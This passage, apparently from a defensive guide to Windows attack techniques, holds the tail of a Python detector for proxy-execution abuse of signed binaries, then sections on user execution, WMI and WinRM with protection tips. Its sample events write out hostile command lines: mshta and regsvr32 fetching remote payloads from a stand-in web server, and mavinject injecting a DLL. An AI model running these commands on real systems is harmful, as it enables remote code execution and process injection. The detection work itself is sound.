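    rule("Tracker.exe DLL proxy", r"(^|\\)tracker\.exe$",
         r"(^|\s)/d\s+\S+\.dll\b"),
]

# A proxy binary spawned by an Office application is far more suspicious than
# one spawned by an installer or an administrator's shell.
OFFICE_PARENTS = re.compile(r"(^|\\)(winword|excel|powerpnt|outlook|msaccess)\.exe$", re.I)


def detect(events):
    """events: dicts with Image, CommandLine, ParentImage (as in Sysmon Event ID 1
    or Windows 4688). Returns one finding per (event, rule) match, in event order."""
    findings = []
    for ev in events:
        for name, image_re, cmd_re in RULES:
            if image_re.search(ev["Image"]) and cmd_re.search(ev["CommandLine"]):
                parent = ev.get("ParentImage", "")
                severity = "high" if OFFICE_PARENTS.search(parent) else "medium"
                findings.append({"rule": name, "image": ev["Image"],
                                 "parent": parent, "severity": severity})
    return findings


def event(parent, image, cmdline):
    return {"ParentImage": parent, "Image": image, "CommandLine": cmdline}


SYS32 = r"C:\Windows\System32"
# Constructed sample events: two benign uses of the same binaries, four abuses.
SAMPLE_EVENTS = [
    event(SYS32 + r"\explorer.exe", SYS32 + r"\rundll32.exe",
          "rundll32.exe shell32.dll,Control_RunDLL appwiz.cpl"),
    event(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", SYS32 + r"\mshta.exe",
          "mshta.exe http://webserver/payload.hta"),
    event(SYS32 + r"\cmd.exe", SYS32 + r"\regsvr32.exe",
          "regsvr32.exe /s /n /u /i:http://webserver/file.sct scrobj.dll"),
    event(SYS32 + r"\cmd.exe", SYS32 + r"\cmstp.exe",
          r"cmstp.exe /ni /s C:\Users\Public\profile.inf"),
    event(r"C:\Users\alice\AppData\Local\Temp\setup.exe", SYS32 + r"\regsvr32.exe",
          r"regsvr32.exe /s C:\Program Files\Vendor\component.dll"),
    event(SYS32 + r"\cmd.exe", SYS32 + r"\mavinject.exe",
          r"mavinject.exe 4242 /INJECTRUNNING C:\Users\Public\evil.dll"),
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print("[%s] %s: %s" % (f["severity"], f["rule"], f["image"]))
```

    The benign rundll32 and regsvr32 events produce nothing, which is the point: blocking these binaries outright, as the sections above suggest, is the strongest control, but where they must stay available the command line and the parent process are what separate normal use from proxy execution.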

    User Execution

    System: Windows, Linux, macOS
    Permissions: User
    Description: Attackers can rely on specific user actions to achieve execution. This can be direct code execution when a user opens a malicious executable delivered as a phishing attachment with a document icon and a visible document file extension. Other techniques can also be involved, for example when a user clicks a link in a phishing email and a browser vulnerability is exploited. The user execution technique is often used at other stages of an intrusion as well, for example when an attacker places a file in a shared directory or on the user's desktop and counts on the user clicking it.

    Protection tips: Raise user awareness. Block downloads of file types such as .scr, .exe, .pif, .cpl, etc. Use anti-virus software and deploy IPS systems.

    Windows Management Instrumentation (WMI)

    System: Windows
    Permissions: User, Administrator
    Description: WMI is a Windows administration toolkit that provides local and remote access to Windows system components. WMI uses SMB and RPC (port 135). Attackers can use WMI to interact with local and remote systems and as a means of carrying out many tactical operations, such as gathering information during discovery and executing files remotely during lateral movement.

    Protection recommendations: Disabling WMI and RPC can make systems unstable. By default, only administrators can connect to a system remotely via WMI. Prevent overlap of privileges between administrative and other privileged accounts.

    Windows Remote Management (WinRM)

    System: Windows
    Permissions: User, Administrator
    Description: Windows Remote Management (WinRM) is the name of a service and protocol that lets a user interact with a remote system (for example, start a file, change the registry, change a service). It is invoked with the winrm command and by other programs such as PowerShell.

    Protection tips: Disable WinRM if it is not needed. If it is, isolate the WinRM infrastructure with separate accounts and permissions. Follow WinRM recommendations for configuring authentication methods, and use host firewalls to allow access to WinRM only from specific devices.
